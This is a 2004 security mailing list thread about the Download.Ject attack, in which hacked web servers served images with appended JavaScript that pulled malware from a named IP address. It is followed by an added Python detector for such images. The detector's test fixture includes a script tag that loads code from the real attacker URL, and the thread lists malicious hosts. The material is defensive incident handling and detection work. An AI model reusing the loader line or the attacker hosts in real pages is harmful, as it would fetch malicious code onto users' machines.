Educause Security Discussion mailing list archives
Re: malware in images
From: Brian Eckman <eckman () UMN EDU>
Date: Thu, 24 Jun 2004 12:12:04 -0500
Kathy Bergsma wrote:
In addition to 217.107.218.147, we detected similar exploits from the following addresses.

64.46.100.96
65.254.51.42
66.98.190.22
67.15.42.34
67.18.79.20
69.50.170.214
69.93.54.158
81.211.105.24
195.208.235.66
207.150.192.12
213.159.117.131

=============
Kathy Bergsma
UF Information Security Manager
352-392-2061
Am I mistaken, or is that just a list of IP addresses that have at least one Web site on them that is exploiting the unpatched IE flaw outlined at http://62.131.86.111/analysis.htm ?

What Doug is reporting is that a bunch of legitimate Web sites were hacked and had a specific piece of malware installed on them that pointed users to a specific URL. This means users visiting "legitimate" sites are being exploited, which is significant news. The other IP addresses have Web sites on them that are not what I would call "legitimate", and are typically getting people to visit them via Spam.

FWIW, see http://securityfocus.com/archive/1/365693/2004-06-09/2004-06-15/0 for details on how to make IE not vulnerable to this or just about any other currently working unpatched exploit.

Thanks,
Brian
On Thu, 24 Jun 2004, Doug Pearson wrote:

There's a bunch of folks scrambling at AV vendors, US-CERT, etc. to figure this one out. Some snippets of information include:

- A large number of web servers were compromised with the malware, including many prominent sites. Those are being cleaned up as identified. The "RFI - Russians IIS Hacks?" described at http://isc.sans.org/diary.php appears to be related to this.
- The URL (reported below) varies its response according to the User-Agent string. From Mozilla or wget you get a broken link. If the User-Agent string is IE's, you get new.html which is a variation on the recent 0day using the redirection injection bug and JavaScript loaders.
- Unconfirmed, but -possible- indication of infection is files Jjjknk32.exe, Edhmifcj.dll, and surf.dat files in the /windows/system32 directory.

It appears that the site/URL listed below is still active. Highly recommend blocking at your network border.

Regards,
Doug Pearson
Research and Education Networking ISAC
http://www.ren-isac.net
Watch Desk 24x7: +1(317)278-6630

-----

At 10:32 PM 6/23/2004 -0500, Doug Pearson wrote:

There's *early* report of lots of sites infected with images that contain malware. The JavaScript appended to the images reaches back to "http: // 217.107.218.147/ dot.php" to get the next dose of malware. The embedded spaces in the URL are mine to prevent accidental launches.

I'm running a current Symantec AV on my desktop. SAV catches what's at the URL as:

Scan type: Realtime Protection Scan
Event: Virus Found!
Virus name: Download.Ject
File: [obfuscated by Doug P]new[1].htm
[and so forth...]

Sites may wish to apply local network filters to block 217.107.218.147!
Regards,
Doug Pearson
Research and Education Networking ISAC
http://www.ren-isac.net
Watch Desk 24x7: +1(317)278-6630

********** Participation and subscription information for this EDUCAUSE Discussion Group discussion list can be found at http://www.educause.edu/cg/.
--
Brian Eckman
Security Analyst
OIT Security and Assurance
University of Minnesota
612-626-7737
"There are 10 types of people in this world. Those who understand binary and those who don't."
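Doug's report describes the hallmark of this compromise: script text appended after the real end of an image file, calling back to the dot.php URL. The following is an added detection example, not code from the thread or from any of the posters, that a web-server admin could run over served image files: it locates the format's end-of-image marker and flags anything trailing it that looks like the loader described above. The sample files are constructed, not captured.

```python
from typing import Dict, List

# End-of-image markers keyed by the format's magic bytes. Data after the last
# such marker is not image data and is where Download.Ject's script was appended.
IMAGE_TRAILERS = {
    b"\xff\xd8\xff": b"\xff\xd9",                   # JPEG: ... EOI
    b"GIF8": b"\x00\x3b",                            # GIF: block terminator + trailer
    b"\x89PNG\r\n\x1a\n": b"IEND\xae\x42\x60\x82",   # PNG: IEND chunk + its CRC
}

# Indicators taken from the reports in this thread (matched case-insensitively).
SUSPICIOUS = (b"<script", b"dot.php", b"217.107.218.147")


def trailing_payload(data: bytes) -> bytes:
    """Return whatever follows the image's last end marker (empty if the file
    is not a recognised image, is truncated, or ends cleanly). Using the last
    occurrence tolerates embedded JPEG thumbnails, which carry their own EOI;
    appended ASCII script cannot contain these binary trailer sequences."""
    for magic, trailer in IMAGE_TRAILERS.items():
        if data.startswith(magic):
            end = data.rfind(trailer)
            return b"" if end == -1 else data[end + len(trailer):]
    return b""


def classify(data: bytes) -> Dict[str, object]:
    """Summarise appended bytes and which known indicators they contain."""
    tail = trailing_payload(data)
    hits: List[str] = [s.decode() for s in SUSPICIOUS if s.lower() in tail.lower()]
    return {"appended_bytes": len(tail), "indicators": hits, "suspicious": bool(hits)}


# Constructed samples: a minimal JPEG skeleton, then the same skeleton with a
# callback to the reported URL appended (assembled from pieces so the
# indicator string never appears literally in this source as a live link).
CLEAN_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00\xff\xd9"
INFECTED_JPEG = CLEAN_JPEG + b'<script src="http://' + b"217.107.218.147" + b'/dot.php"></script>'

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN_JPEG), ("infected", INFECTED_JPEG)):
        print(name, classify(blob))
```

Run it over the document root of a server and review any file whose `appended_bytes` is non-zero, even when no listed indicator matches, since the callback URL can change while the appended-script technique stays the same.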